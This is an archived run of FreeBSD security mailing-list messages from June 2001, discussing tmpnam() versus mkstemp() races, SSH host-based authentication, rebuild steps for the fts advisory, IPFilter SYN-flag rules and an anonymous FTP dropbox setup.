Helmeste [010608 16:26] wrote: > Well, this may be changed in newer versions of the library, or you could go > into the code yourself and change it. Personally I don't like going into > other people's code, but if you really want to fix this, then the best of > luck to you :) > Theres not much other answer that I can provide other than this, sorry. tmpnam() is unsafe because it only gives you a name in memory, the file name that it generates is still not actually created so if you go ahead and blindly create/open the filename you get back from tmpnam() you may loose a race against something else trying to dupe you into opening or clobbering something you shouldn't. mkstemp() is safe because it actually generates the file for you and creates it with reasonable permissions: The mkstemp() function makes the same replacement to the template and creates the template file, mode 0600, returning a file descriptor opened for reading and writing. This avoids the race between testing for a file's existence and opening it for use. This has been discussed on many lists, many times in the past. -- -Alfred Perlstein [alfred@freebsd.org] Instead of asking why a piece of software is using "1970s technology," start asking why software is ignoring 30 years of accumulated wisdom. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 16:19:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id DE0F437B407 for ; Fri, 8 Jun 2001 16:19:07 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GEMWR500.9GT; Fri, 8 Jun 2001 16:18:41 -0700 Message-ID: <3B215D6A.9E968BAE@globalstar.com> Date: Fri, 08 Jun 2001 16:19:06 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Michael Avdeev Cc: Misha Kamushkin , freebsd-security@FreeBSD.ORG Subject: Re: openssh auth. problem References: <9C643FE251025246BF8CE3ADFA3765954873@hydrogen.tmolp.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Michael Avdeev wrote: > > i actually finally got it to work with pucblickey authentication. i > generated a key and copied it to the server. i called the file > authorized_keys2. what i initially planed to do is to have > hostbasedauthentication. what's the difference between hostbased and > publickey. Host-based authentication _is_ public-key-crypto based in SSH. Instead of using the user's key pairs, the host key pairs are used. > i cant get it to work using hostbasedauth. thanks for your > help. You want to enable RhostRSAAuthentication for host-key based authentication (beyond just the "known-host" check). -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 17: 8:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from onion.ish.org (onion.ish.org [210.145.219.202]) by hub.freebsd.org (Postfix) with ESMTP id E966537B405 for ; Fri, 8 Jun 2001 17:08:43 -0700 (PDT) (envelope-from ishizuka@ish.org) Received: from localhost (ishizuka@localhost [127.0.0.1]) by onion.ish.org (8.11.3/8.11.3/2001-05-23) with ESMTP id f5908fK07119 for ; Sat, 9 Jun 2001 09:08:41 +0900 (JST) (envelope-from ishizuka@ish.org) To: freebsd-security@FreeBSD.ORG Subject: RE: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts In-Reply-To: <20010608164526.4F02437B405@hub.freebsd.org> References: <20010608164526.4F02437B405@hub.freebsd.org> X-Mailer: Mew version 1.94.2 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint20: 276D 697A C2CB 1580 C683 8F18 DA98 1A4A 50D2 C4CB X-PGP-Fingerprint16: C6 DE 46 24 D7 9F 22 EB 79 E2 90 AB 1B 9A 35 2E X-PGP-Public-Key: http://www.ish.org/pgp-public-key.txt X-URL: http://www.ish.org/ Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20010609090841X.ishizuka@onion.ish.org> Date: Sat, 09 Jun 2001 09:08:41 +0900 From: Masachika ISHIZUKA X-Dispatcher: imput version 20000414(IM141) Lines: 41 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>> But it seems that: >>> 1. >>> # cd /usr/src/lib/libc >>> >>> should be /usr/src/lib/libc/gen, right? >>> >>> (now in which directory do I "make depend && make all install"?) >> >> No, it shouldn't. >> src/lib/libc/gen contains only part of the libc sources - the so-called >> 'generic' functions. In this case, you need to rebuild the whole of libc - >> libc/gen only builds several object files, not a whole library. > > The patch didn't work for me until I cd-ed to .../gen > > Either the patch or the instructions should be fixed. Dear, sir. I have the same question, above. And I have more questions. The following commands are not inked statically, why do we have to recompile these commands ? # cd /usr/src/usr.bin/du # make depend && make all install # cd /usr/src/usr.bin/find # make depend && make all install # cd /usr/src/usr.bin/chgrp # make depend && make all install # cd /usr/src/libexec/ftpd # make depend && make all install # cd /usr/src/usr.sbin/ckdist # make depend && make all install # cd /usr/src/usr.sbin/ctm # make depend && make all install # cd /usr/src/usr.sbin/mtree # make depend && make all install # cd /usr/src/usr.sbin/pkg_install # make depend && make all install -- ishizuka@ish.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 17:39:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from imo-r02.mx.aol.com (imo-r02.mx.aol.com [152.163.225.98]) by hub.freebsd.org (Postfix) with ESMTP id C447E37B403 for ; Fri, 8 Jun 2001 17:39:17 -0700 (PDT) (envelope-from Bcole742@aol.com) Received: from Bcole742@aol.com by imo-r02.mx.aol.com (mail_out_v30.22.) id n.9.16a7abea (3940) for ; Fri, 8 Jun 2001 20:39:15 -0400 (EDT) From: Bcole742@aol.com Message-ID: <9.16a7abea.2852ca32@aol.com> Date: Fri, 8 Jun 2001 20:39:14 EDT Subject: Mailing list To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="part1_9.16a7abea.2852ca32_boundary" X-Mailer: AOL 6.0 for Windows US sub 10520 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --part1_9.16a7abea.2852ca32_boundary Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit I would like to recieve your mailing list on freebsd security. Thank you --part1_9.16a7abea.2852ca32_boundary Content-Type: text/html; charset="US-ASCII" Content-Transfer-Encoding: 7bit I would like to recieve your mailing list on freebsd security.  Thank you --part1_9.16a7abea.2852ca32_boundary-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 19:56:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from mta5.rcsntx.swbell.net (mta5.rcsntx.swbell.net [151.164.30.29]) by hub.freebsd.org (Postfix) with ESMTP id 698B437B406 for ; Fri, 8 Jun 2001 19:56:24 -0700 (PDT) (envelope-from ryanpek@swbell.net) Received: from mhx800 ([64.219.216.69]) by mta5.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GEN009AI6OWK4@mta5.rcsntx.swbell.net> for freebsd-security@FreeBSD.ORG; Fri, 8 Jun 2001 21:53:21 -0500 (CDT) Date: Fri, 08 Jun 2001 21:53:17 -0500 From: Ryan Subject: IPFILTER and flags S/SA To: freebsd-security@FreeBSD.ORG Message-id: <000601c0f08f$566f53e0$01000001@mhx800> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4522.1200 Content-type: text/plain; charset="iso-8859-1" Content-transfer-encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 References: <9C643FE251025246BF8CE3ADFA3765954873@hydrogen.tmolp.com> <3B215D6A.9E968BAE@globalstar.com> X-Priority: 3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org from the IPF howto - Some examples use flags S/SA instead of flags S. flags S actually equates to flags S/AUPRFS and matches against only the SYN packet out of all six possible flags, while flags S/SA will allow pack- ets that may or may not have the URG, PSH, FIN, or RST flags set. Some protocols demand the URG or PSH flags, and S/SAFR would be a better choice for these, however we feel that it is less secure to blindly use S/SA when it isn't required. But it's your firewall. - I was wondering if any1 could maybe explain more in detail why S/SA is unsafe? example: pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags S keep state pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags S/SA keep state ryanpek@swbell.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jun 8 20:19:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns.morning.ru (ns.morning.ru [195.161.98.5]) by hub.freebsd.org (Postfix) with ESMTP id B274637B405 for ; Fri, 8 Jun 2001 20:19:10 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 ([195.161.98.236]) by ns.morning.ru (8.9.3/8.9.3) with ESMTP id LAA76066; Sat, 9 Jun 2001 11:18:59 +0800 (KRAST) (envelope-from poige@morning.ru) Date: Sat, 9 Jun 2001 11:19:37 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <19592974009.20010609111937@morning.ru> To: Ryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFILTER and flags S/SA In-Reply-To: <000601c0f08f$566f53e0$01000001@mhx800> References: <9C643FE251025246BF8CE3ADFA3765954873@hydrogen.tmolp.com> <3B215D6A.9E968BAE@globalstar.com> <000601c0f08f$566f53e0$01000001@mhx800> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > from the IPF howto > - > Some examples use flags S/SA instead of flags S. > flags S actually equates to flags S/AUPRFS and > matches against only the SYN packet out of all six > possible flags, while flags S/SA will allow pack- > ets that may or may not have the URG, PSH, FIN, or > RST flags set. Some protocols demand the URG or > PSH flags, and S/SAFR would be a better choice for > these, however we feel that it is less secure to > blindly use S/SA when it isn't required. But it's > your firewall. > - > I was wondering if any1 could maybe explain more in detail why S/SA is > unsafe? English isn't my native language, but it seems to me that the quotation from IPF-howto does answer your question clearly. so I just expand it to you: S/SA means check for S looking at S and A, other flags don't matter so it will select packets with SYN set, even if it also has RST set. In order to avoid such behavior, they suggest using S/SAFR which would mean the next: Check if packet has SYN set, and none of (ACK, FIN, RST). > example: > pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags > S keep state > pass in quick on xl0 proto tcp from any to 64.219.216.65/32 port = 80 flags > S/SA keep state > ryanpek@swbell.net > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Igor http://poige.nm.ru mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 9 8:29:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 1497137B401 for ; Sat, 9 Jun 2001 08:29:13 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from ibmka (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with SMTP id TAA65264 for ; Sat, 9 Jun 2001 19:29:05 +0400 (MSD) Message-ID: <027b01c0f0f8$ea521f20$0600a8c0@ibmka.internethelp.ru> From: "Nickolay A. Kritsky" To: Subject: security-advisories mailing list (Was: Re: FreeBSD Security Advisory: FreeBSD-SA-01:40.fts) Date: Sat, 9 Jun 2001 19:28:59 +0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Just want to ask somebody in security staff of FreeBSD (Mr Kennaway?) : why "FreeBSD Security Advisory: FreeBSD-SA-01:40.fts" didn't come to me, though i was subscribed to security-advisories@freebsd.org . May be the list is broken and i better subscribe to another list? Thanks for any help. This is snippet from the last message, that came to my mailbox from security-advisories@freebsd.org Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f4SNLwY53233; Mon, 28 May 2001 16:21:58 -0700 (PDT) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 28 May 2001 16:21:58 -0700 (PDT) Message-Id: <200105282321.f4SNLwY53233@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Ports Security Advisory FreeBSD-SA-01:23.icecast [REVISED] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 9 10:19:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from audio.gfoster.com (24-168-222-182.mf.cox.rr.com [24.168.222.182]) by hub.freebsd.org (Postfix) with ESMTP id 36B4637B403 for ; Sat, 9 Jun 2001 10:19:21 -0700 (PDT) (envelope-from gfoster@audio.gfoster.com) Received: (from gfoster@localhost) by audio.gfoster.com (8.11.3/8.11.3) id f59HIJ235191; Sat, 9 Jun 2001 13:18:19 -0400 (EDT) (envelope-from gfoster) From: Glen Foster MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15138.23131.648658.477266@audio.gfoster.com> Date: Sat, 9 Jun 2001 13:18:19 -0400 To: security@freebsd.org Subject: Q: suiddir on ~ftp/incoming? X-Mailer: VM 6.90 under 21.1 (patch 13) "Crater Lake" XEmacs Lucid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Standard ftpd on a not-so-old 4.3-S. With the less-than-sterling record of more featureful FTP servers, I'd like to find a way to stick with old faithful. Is it a bad idea to make a directory, ~ftp/incoming, with perms=5333, on an anonymous FTP server as a "dropbox" for uploading? No untrusted shell accounts on the machine in question. As most who try to provide drop boxes discover, warez d00dz quickly find them and manage to fill them up with bit strings that, according to some, are worth billions of dollars each and every year. They do this by the mechanism of creating a directory that is owned by "ftp," with which and in they can play their little games at will. The intention is, by enforcing suiddir, the directories and files they create won't be listable, thus removing much of the raison d'etre for their creation. Of course, the "filler" will still be able to write, fill up the disk, etc. but the hordes who follow after will be dissuaded and not consume all your mbufs with their requests. Anybody done this? Results over time? Yes, it is a form of STO easily defeated by miscreants keeping a directory of uploaded files and sharing it with customers. But, in practice, is it worthwhile to do? Any insight would be appreciated, Glen Foster To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message